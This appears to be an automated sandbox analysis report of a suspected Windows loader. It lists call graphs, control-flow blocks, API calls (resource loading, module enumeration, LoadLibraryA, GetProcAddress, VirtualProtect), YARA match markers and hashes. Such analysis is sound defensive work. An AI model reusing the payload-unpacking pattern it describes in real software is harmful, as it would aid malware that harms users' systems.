15256->15258 15260 40d2b7 15257->15260 15258->15257 15259 41046e __encode_pointer 6 API calls 15258->15259 15259->15249 15325 40e80f 15260->15325 15264 40e576 _ftell 15263->15264 15265 40e5a3 15264->15265 15266 40e586 15264->15266 15267 40e5e4 HeapSize 15265->15267 15270 40d6e0 __lock 63 API calls 15265->15270 15268 40bfc1 _ftell 63 API calls 15266->15268 15272 40e59b _ftell 15267->15272 15269 40e58b 15268->15269 15271 40e744 _ftell 6 API calls 15269->15271 15273 40e5b3 ___sbh_find_block 15270->15273 15271->15272 15272->15253 15281 40e604 15273->15281 15280 411d0f 15276->15280 15278 411d4e 15278->15252 15279 411d2f Sleep 15279->15280 15280->15278 15280->15279 15285 40e34f 15280->15285 15284 40d606 LeaveCriticalSection 15281->15284 15283 40e5df 15283->15267 15283->15272 15284->15283 15286 40e35b _ftell 15285->15286 15287 40e370 15286->15287 15288 40e362 15286->15288 15290 40e383 15287->15290 15291 40e377 15287->15291 15289 40b84d _malloc 63 API calls 15288->15289 15294 40e36a _realloc _ftell 15289->15294 15299 40e4f5 15290->15299 15315 40e390 _memcpy_s ___sbh_resize_block ___sbh_find_block 15290->15315 15292 40b6b5 ___crtsetenv 63 API calls 15291->15292 15292->15294 15293 40e528 15295 40d2e3 _realloc 6 API calls 15293->15295 15294->15280 15298 40e52e 15295->15298 15296 40d6e0 __lock 63 API calls 15296->15315 15297 40e4fa HeapReAlloc 15297->15294 15297->15299 15300 40bfc1 _ftell 63 API calls 15298->15300 15299->15293 15299->15297 15301 40e54c 15299->15301 15302 40d2e3 _realloc 6 API calls 15299->15302 15304 40e542 15299->15304 15300->15294 15301->15294 15303 40bfc1 _ftell 63 API calls 15301->15303 15302->15299 15305 40e555 GetLastError 15303->15305 15307 40bfc1 _ftell 63 API calls 15304->15307 15305->15294 15319 40e4c3 15307->15319 15308 40e41b HeapAlloc 15308->15315 15309 40e470 HeapReAlloc 15309->15315 15310 40e4c8 GetLastError 15310->15294 15311 40def2 ___sbh_alloc_block 5 API calls 15311->15315 15312 40e4db 15312->15294 15314 40bfc1 _ftell 63 API calls 15312->15314 15313 40d2e3 _realloc 6 API calls 15313->15315 15316 40e4e8 15314->15316 15315->15293 15315->15294 15315->15296 15315->15308 15315->15309 15315->15311 15315->15312 15315->15313 15317 40e4be 15315->15317 15320 40d743 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 15315->15320 15321 40e493 15315->15321 15316->15294 15316->15305 15318 40bfc1 _ftell 63 API calls 15317->15318 15318->15319 15319->15294 15319->15310 15320->15315 15324 40d606 LeaveCriticalSection 15321->15324 15323 40e49a 15323->15315 15324->15323 15328 40d606 LeaveCriticalSection 15325->15328 15327 40d2bc 15327->15239 15328->15327 15330 40b9aa _ftell _strnlen 15329->15330 15331 40b9b8 15330->15331 15334 40b9ec 15330->15334 15332 40bfc1 _ftell 63 API calls 15331->15332 15333 40b9bd 15332->15333 15335 40e744 _ftell 6 API calls 15333->15335 15336 40d6e0 __lock 63 API calls 15334->15336 15340 40b9cd _ftell 15335->15340 15337 40b9f3 15336->15337 15386 40b917 15337->15386 15340->14370 15343 4017cc _memcpy_s 15342->15343 15343->14374 15346 40af70 15344->15346 15345 40b84d _malloc 63 API calls 15345->15346 15346->15345 15347 40af8a 15346->15347 15348 40d2e3 _realloc 6 API calls 15346->15348 15352 40af8c std::bad_alloc::bad_alloc 15346->15352 15347->14379 15348->15346 15349 40afb2 15600 40af49 15349->15600 15352->15349 15354 40d2bd __cinit 74 API calls 15352->15354 15354->15349 15355 40afca 15357 401903 lstrlenA 15356->15357 15358 4018fc 15356->15358 15612 4017e0 15357->15612 15358->14401 15361 401940 GetLastError 15363 40194b MultiByteToWideChar 15361->15363 15364 40198d 15361->15364 15362 401996 15362->14401 15365 4017e0 78 API calls 15363->15365 15364->15362 15628 401030 GetLastError 15364->15628 15367 401970 MultiByteToWideChar 15365->15367 15367->15364 15369 40af66 75 API calls 15368->15369 15370 40187c 15369->15370 15371 401885 SysAllocString 15370->15371 15372 4018a4 15370->15372 15371->15372 15372->14403 15374 40231a SafeArrayUnaccessData 15373->15374 15374->14410 15376 4019aa InterlockedDecrement 15375->15376 15381 4019df VariantClear 15375->15381 15377 4019b8 15376->15377 15376->15381 15378 4019c2 SysFreeString 15377->15378 15379 4019c9 15377->15379 15377->15381 15378->15379 15637 40aec0 15379->15637 15381->14417 15383 401571 15382->15383 15385 401582 15382->15385 15643 40afe0 15383->15643 15385->14382 15387 40b92c 15386->15387 15388 40b930 15386->15388 15392 40ba18 15387->15392 15388->15387 15390 40b942 _strlen 15388->15390 15395 40eeab 15388->15395 15390->15387 15405 40edfb 15390->15405 15599 40d606 LeaveCriticalSection 15392->15599 15394 40ba1f 15394->15340 15402 40ef2b 15395->15402 15403 40eec6 15395->15403 15396 40eecc WideCharToMultiByte 15396->15402 15396->15403 15397 411cba __calloc_crt 63 API calls 15397->15403 15398 40eeef WideCharToMultiByte 15399 40ef37 15398->15399 15398->15403 15400 40b6b5 ___crtsetenv 63 API calls 15399->15400 15400->15402 15402->15390 15403->15396 15403->15397 15403->15398 15403->15402 15404 40b6b5 ___crtsetenv 63 API calls 15403->15404 15408 414d44 15403->15408 15404->15403 15500 40ed0d 15405->15500 15409 414d76 15408->15409 15410 414d59 15408->15410 15412 414dd4 15409->15412 15454 417e7e 15409->15454 15411 40bfc1 _ftell 63 API calls 15410->15411 15413 414d5e 15411->15413 15414 40bfc1 _ftell 63 API calls 15412->15414 15416 40e744 _ftell 6 API calls 15413->15416 15442 414d6e 15414->15442 15416->15442 15418 414db5 15420 414e12 15418->15420 15421 414de7 15418->15421 15422 414dcb 15418->15422 15420->15442 15465 414c98 15420->15465 15426 411c75 __malloc_crt 63 API calls 15421->15426 15421->15442 15424 40eeab ___wtomb_environ 120 API calls 15422->15424 15427 414dd0 15424->15427 15429 414df7 15426->15429 15427->15412 15427->15420 15428 414e8f 15430 414f7a 15428->15430 15435 414e98 15428->15435 15429->15420 15434 411c75 __malloc_crt 63 API calls 15429->15434 15429->15442 15432 40b6b5 ___crtsetenv 63 API calls 15430->15432 15431 414e41 15433 40b6b5 ___crtsetenv 63 API calls 15431->15433 15432->15442 15437 414e4b 15433->15437 15434->15420 15436 411d54 __recalloc_crt 74 API calls 15435->15436 15435->15442 15439 414e51 _strlen 15436->15439 15437->15439 15469 411d54 15437->15469 15441 411cba __calloc_crt 63 API calls 15439->15441 15439->15442 15453 414f5e 15439->15453 15440 40b6b5 ___crtsetenv 63 API calls 15440->15442 15443 414efb _strlen 15441->15443 15442->15403 15444 40ef42 _strcpy_s 63 API calls 15443->15444 15443->15453 15445 414f14 15444->15445 15446 414f28 SetEnvironmentVariableA 15445->15446 15447 40e61c __invoke_watson 10 API calls 15445->15447 15448 414f49 15446->15448 15449 414f52 15446->15449 15451 414f25 15447->15451 15452 40bfc1 _ftell 63 API calls 15448->15452 15450 40b6b5 ___crtsetenv 63 API calls 15449->15450 15450->15453 15451->15446 15452->15449 15453->15440 15453->15442 15474 417dc2 15454->15474 15456 414d89 15456->15412 15456->15418 15457 414cea 15456->15457 15458 414cfb 15457->15458 15462 414d3b 15457->15462 15459 411cba __calloc_crt 63 API calls 15458->15459 15460 414d12 15459->15460 15461 40e79a __amsg_exit 63 API calls 15460->15461 15463 414d24 15460->15463 15461->15463 15462->15418 15463->15462 15481 417d6d 15463->15481 15466 414ca6 15465->15466 15467 40edfb __fassign 107 API calls 15466->15467 15468 414ccd 15466->15468 15467->15466 15468->15428 15468->15431 15472 411d5d 15469->15472 15471 411da0 15471->15439 15472->15471 15473 411d81 Sleep 15472->15473 15489 40b783 15472->15489 15473->15472 15475 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15474->15475 15476 417dd6 15475->15476 15477 40bfc1 _ftell 63 API calls 15476->15477 15480 417df4 __mbschr_l 15476->15480 15478 417de4 15477->15478 15479 40e744 _ftell 6 API calls 15478->15479 15479->15480 15480->15456 15482 417d7e _strlen 15481->15482 15488 417d7a 15481->15488 15483 40b84d _malloc 63 API calls 15482->15483 15484 417d91 15483->15484 15485 40ef42 _strcpy_s 63 API calls 15484->15485 15484->15488 15486 417da3 15485->15486 15487 40e61c __invoke_watson 10 API calls 15486->15487 15486->15488 15487->15488 15488->15463 15490 40b792 15489->15490 15491 40b7ba 15489->15491 15490->15491 15492 40b79e 15490->15492 15493 40e56a __msize 64 API calls 15491->15493 15497 40b7cf 15491->15497 15495 40bfc1 _ftell 63 API calls 15492->15495 15493->15497 15494 40e34f _realloc 72 API calls 15499 40b7b3 _memset 15494->15499 15496 40b7a3 15495->15496 15498 40e744 _ftell 6 API calls 15496->15498 15497->15494 15498->15499 15499->15472 15501 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15500->15501 15502 40ed21 15501->15502 15503 40ed2a 15502->15503 15504 40ed42 15502->15504 15506 40ed75 15502->15506 15503->15390 15505 40bfc1 _ftell 63 API calls 15504->15505 15507 40ed47 15505->15507 15508 40ed99 15506->15508 15509 40ed7f 15506->15509 15510 40e744 _ftell 6 API calls 15507->15510 15512 40eda1 15508->15512 15513 40edb5 15508->15513 15511 40bfc1 _ftell 63 API calls 15509->15511 15510->15503 15515 40ed84 15511->15515 15518 414b9e 15512->15518 15538 414b5c 15513->15538 15517 40e744 _ftell 6 API calls 15515->15517 15517->15503 15519 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15518->15519 15520 414bb2 15519->15520 15521 414bd3 15520->15521 15523 414c06 15520->15523 15536 414bbb 15520->15536 15522 40bfc1 _ftell 63 API calls 15521->15522 15524 414bd8 15522->15524 15525 414c10 15523->15525 15526 414c2a 15523->15526 15529 40e744 _ftell 6 API calls 15524->15529 15530 40bfc1 _ftell 63 API calls 15525->15530 15527 414c34 15526->15527 15528 414c49 15526->15528 15543 417c1d 15527->15543 15532 414b5c ___crtCompareStringA 96 API calls 15528->15532 15529->15536 15533 414c15 15530->15533 15534 414c63 15532->15534 15535 40e744 _ftell 6 API calls 15533->15535 15534->15536 15537 40bfc1 _ftell 63 API calls 15534->15537 15535->15536 15536->15503 15537->15536 15539 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15538->15539 15540 414b6f 15539->15540 15559 4147ec 15540->15559 15544 417c33 15543->15544 15545 417c58 ___ascii_strnicmp 15543->15545 15546 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15544->15546 15545->15536 15547 417c3e 15546->15547 15548 417c43 15547->15548 15549 417c78 15547->15549 15550 40bfc1 _ftell 63 API calls 15548->15550 15552 417c82 15549->15552 15558 417caa 15549->15558 15551 417c48 15550->15551 15553 40e744 _ftell 6 API calls 15551->15553 15554 40bfc1 _ftell 63 API calls 15552->15554 15553->15545 15556 417c87 15554->15556 15555 4168fc 98 API calls __tolower_l 15555->15558 15557 40e744 _ftell 6 API calls 15556->15557 15557->15545 15558->15545 15558->15555 15560 414818 CompareStringW 15559->15560 15562 41482f strncnt 15559->15562 15561 41483b GetLastError 15560->15561 15560->15562 15561->15562 15564 414a95 15562->15564 15567 4148a4 15562->15567 15578 414881 15562->15578 15563 40ce09 _$I10_OUTPUT 5 API calls 15565 414b5a 15563->15565 15566 417a20 ___ansicp 87 API calls 15564->15566 15565->15503 15568 414abb 15566->15568 15569 414962 MultiByteToWideChar 15567->15569 15573 4148e6 GetCPInfo 15567->15573 15567->15578 15570 414b1c CompareStringA 15568->15570 15571 417a69 ___convertcp 70 API calls 15568->15571 15568->15578 15569->15578 15579 414982 15569->15579 15572 414b3a 15570->15572 15570->15578 15575 414ae0 15571->15575 15576 40b6b5 ___crtsetenv 63 API calls 15572->15576 15574 4148f7 15573->15574 15573->15578 15574->15569 15574->15578 15575->15578 15582 417a69 ___convertcp 70 API calls 15575->15582 15580 414b40 15576->15580 15577 4149d9 MultiByteToWideChar 15581 4149f2 MultiByteToWideChar 15577->15581 15598 414a83 15577->15598 15578->15563 15583 40b84d _malloc 63 API calls 15579->15583 15590 41499f __crtCompareStringA_stat 15579->15590 15584 40b6b5 ___crtsetenv 63 API calls 15580->15584 15593 414a09 15581->15593 15581->15598 15585 414b01 15582->15585 15583->15590 15584->15578 15588 414b16 15585->15588 15589 414b0a 15585->15589 15586 4147ae __freea 63 API calls 15586->15578 15587 414a1f __crtCompareStringA_stat 15592 414a53 MultiByteToWideChar 15587->15592 15587->15598 15588->15570 15591 40b6b5 ___crtsetenv 63 API calls 15589->15591 15590->15577 15590->15578 15591->15578 15594 414a66 CompareStringW 15592->15594 15595 414a7d 15592->15595 15593->15587 15596 40b84d _malloc 63 API calls 15593->15596 15594->15595 15597 4147ae __freea 63 API calls 15595->15597 15596->15587 15597->15598 15598->15586 15599->15394 15606 40d0f5 15600->15606 15603 40cd39 15604 40cd62 15603->15604 15605 40cd6e RaiseException 15603->15605 15604->15605 15605->15355 15607 40d115 _strlen 15606->15607 15611 40af59 15606->15611 15608 40b84d _malloc 63 API calls 15607->15608 15607->15611 15609 40d128 15608->15609 15610 40ef42 _strcpy_s 63 API calls 15609->15610 15609->15611 15610->15611 15611->15603 15613 4017f3 15612->15613 15614 4017e9 EntryPoint 15612->15614 15615 401805 15613->15615 15616 4017fb EntryPoint 15613->15616 15614->15613 15617 401818 15615->15617 15618 40180e EntryPoint 15615->15618 15616->15615 15619 40183e 15617->15619 15622 40b783 __recalloc 73 API calls 15617->15622 15625 401844 15617->15625 15618->15617 15620 40b6b5 ___crtsetenv 63 API calls 15619->15620 15620->15625 15626 40182d 15622->15626 15623 40186d MultiByteToWideChar 15623->15361 15623->15362 15624 40184e EntryPoint 15624->15625 15625->15623 15625->15624 15630 40b743 15625->15630 15626->15625 15627 401834 EntryPoint 15626->15627 15627->15619 15629 401044 EntryPoint 15628->15629 15631 40e231 __calloc_impl 63 API calls 15630->15631 15632 40b75d 15631->15632 15633 40bfc1 _ftell 63 API calls 15632->15633 15636 40b779 15632->15636 15634 40b770 15633->15634 15635 40bfc1 _ftell 63 API calls 15634->15635 15634->15636 15635->15636 15636->15625 15638 40b6b5 _ftell 15637->15638 15639 40b73d _ftell 15638->15639 15640 40b714 HeapFree 15638->15640 15639->15381 15640->15639 15641 40b727 15640->15641 15642 40bfc1 _ftell 63 API calls 15641->15642 15642->15639 15644 40aff8 15643->15644 15645 40b01f __VEC_memcpy 15644->15645 15646 40b027 15644->15646 15645->15646 15646->15385 15648 40e8ea _ftell 15647->15648 15649 40d6e0 __lock 63 API calls 15648->15649 15650 40e8f1 15649->15650 15651 40e9ba __initterm 15650->15651 15652 40e91d 15650->15652 15666 40e9f5 15651->15666 15654 4104e9 __decode_pointer 6 API calls 15652->15654 15656 40e928 15654->15656 15658 40e9aa __initterm 15656->15658 15660 4104e9 __decode_pointer 6 API calls 15656->15660 15657 40e9f2 _ftell 15657->14423 15658->15651 15664 40e93d 15660->15664 15661 40e9e9 15662 40e7ee _doexit 4 API calls 15661->15662 15662->15657 15663 4104e0 6 API calls _raise 15663->15664 15664->15658 15664->15663 15665 4104e9 6 API calls __decode_pointer 15664->15665 15665->15664 15667 40e9fb 15666->15667 15669 40e9d6 15666->15669 15671 40d606 LeaveCriticalSection 15667->15671 15669->15657 15670 40d606 LeaveCriticalSection 15669->15670 15670->15661 15671->15669

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 15 401c93-401c95 14->15 16 401c79-401c7b 14->16 20 401c98-401c9a 15->20 18 401c7d-401c83 16->18 19 401c8f-401c91 16->19 18->15 22 401c85-401c8d 18->22 19->20 23 401cb0-401cce call 401650 20->23 24 401c9c-401caf CloseHandle 20->24 22->14 22->19 34 401cd0-401cd4 23->34 30 401ef3-401f1a call 401300 SizeofResource 27->30 28->30 39 401f1c-401f2f 30->39 40 401f5f-401f69 30->40 36 401cf0-401cf2 34->36 37 401cd6-401cd8 34->37 38 401cf5-401cf7 36->38 41 401cda-401ce0 37->41 42 401cec-401cee 37->42 38->24 43 401cf9-401d09 Module32Next 38->43 44 401f33-401f5d call 401560 39->44 45 401f73-401f75 40->45 46 401f6b-401f72 40->46 41->36 47 401ce2-401cea 41->47 42->38 43->7 48 401d0f 43->48 44->40 50 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 45->50 51 401f77-401f8d call 401560 45->51 46->45 47->34 47->42 53 401d10-401d2e call 401650 48->53 50->5 87 4021aa-4021c0 50->87 51->50 61 401d30-401d34 53->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 68 401d55-401d57 63->68 66 401d3a-401d40 64->66 67 401d4c-401d4e 64->67 66->63 70 401d42-401d4a 66->70 67->68 68->24 71 401d5d-401d7b call 401650 68->71 70->61 70->67 76 401d80-401d84 71->76 78 401da0-401da2 76->78 79 401d86-401d88 76->79 83 401da5-401da7 78->83 81 401d8a-401d90 79->81 82 401d9c-401d9e 79->82 81->78 85 401d92-401d9a 81->85 82->83 83->24 86 401dad-401dbd Module32Next 83->86 85->76 85->82 86->7 86->53 89 4021c6-4021ca 87->89 90 40246a-402470 87->90 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 250bd01d 122->154 155 40234e call 250bd006 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 250bd01d 135->152 153 402390 call 250bd006 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                                                                                              APIs
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                              • _getenv.LIBCMT ref: 00401ABA
                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                              • Module32First.KERNEL32 ref: 00401C48
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                              • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                              • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00401DC4
                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                              • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                              • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                              • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                              • _malloc.LIBCMT ref: 00401EBA
                                                                                                                              • _memset.LIBCMT ref: 00401EDD
                                                                                                                              • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2209421224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000002.2209421224.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000008.00000002.2209421224.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                              • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                              • API String ID: 1430744539-2962942730
                                                                                                                              • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                              • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                              • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                              • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                              APIs
                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                              • GetLastError.KERNEL32 ref: 00401940
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3322701435-0
                                                                                                                              • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                              • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                              • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                              • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                              APIs
                                                                                                                              • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1411284514-0
                                                                                                                              • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                              • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                              • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                              • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                              APIs
                                                                                                                              • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                                                                                • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                              • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2427264223-0
                                                                                                                              • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                              • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                                                                              • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                              • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 191 252b9130-252b91b1 VirtualProtect 194 252b91ba-252b91df 191->194 195 252b91b3-252b91b9 191->195 195->194
                                                                                                                              APIs
                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 252B91A4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2265355175.00000000252B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 252B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_252b0000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ProtectVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 544645111-0
                                                                                                                              • Opcode ID: 49791f61bb92d372ee7a81286493c0308fc554bfe9ca946e84886564f7eed4d9
                                                                                                                              • Instruction ID: ce85deea056cb97b1be65b51c242c98c300addcb167a81dec1a2921e4c9f7151
                                                                                                                              • Opcode Fuzzy Hash: 49791f61bb92d372ee7a81286493c0308fc554bfe9ca946e84886564f7eed4d9
                                                                                                                              • Instruction Fuzzy Hash: A711F4B1D002499FDB10DFAAD884B9EFBF5BF88720F14842AD519A7250D779A940CFA0
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                              • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocString_malloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 959018026-0
                                                                                                                              • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                              • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
